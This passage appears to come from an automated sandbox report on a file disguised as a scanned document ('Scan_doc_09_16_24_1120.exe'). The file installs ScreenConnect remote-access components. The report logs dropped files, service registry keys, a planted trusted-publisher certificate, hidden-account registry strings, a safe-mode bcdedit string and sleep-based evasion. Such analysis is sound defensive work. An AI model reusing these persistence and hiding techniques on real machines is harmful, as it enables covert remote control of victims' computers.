                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: ScreenConnect.ClientService.dll.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (73549b67-726b-470e-ab1a-fbbb83a6a15b)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2282591404.00000000024C2000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.3273020779.00000000023F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.2940865152.0000000003100000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 227060B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 2271FC60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Memory allocated: 17B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Memory allocated: 1B2F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Memory allocated: B80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Memory allocated: 2540000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Memory allocated: 4540000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Memory allocated: BA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Memory allocated: 11F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe Memory allocated: 31F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Memory allocated: 780000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Memory allocated: 1A3F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Memory allocated: 1580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe Memory allocated: 1B2F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599607
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599500
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599390
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599235
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599110
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598880
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597959
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597813
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597688
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597563
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597438
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597328
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597217
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597109
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596997
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596883
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596781
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596672
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596562
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596453
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596344
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596234
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596125
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596015
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595906
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595783
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595565
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595141
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595031
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594922
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594813
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594703
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594594
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594484
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594044Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592883Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592571Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 6522
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 3130
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe TID: 6848 Thread sleep time: -40000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -26747778906878833s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -599875s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -599766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -599607s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -599500s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -599390s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -599235s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -599110s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -598880s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -598485s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -597959s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -597813s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -597688s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -597563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -597438s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -597328s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -597217s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -597109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596997s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596883s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596781s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596672s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596344s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596234s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596125s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -596015s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -595906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -595783s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -595565s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -595141s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -595031s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594922s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594813s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594703s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594594s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594484s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594375s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594265s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594156s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -594044s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593938s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593813s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593688s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593563s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593453s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593344s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593219s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593109s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -593000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -592883s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -592687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4564 Thread sleep time: -592571s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 1120 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe TID: 7684 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe TID: 5560 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
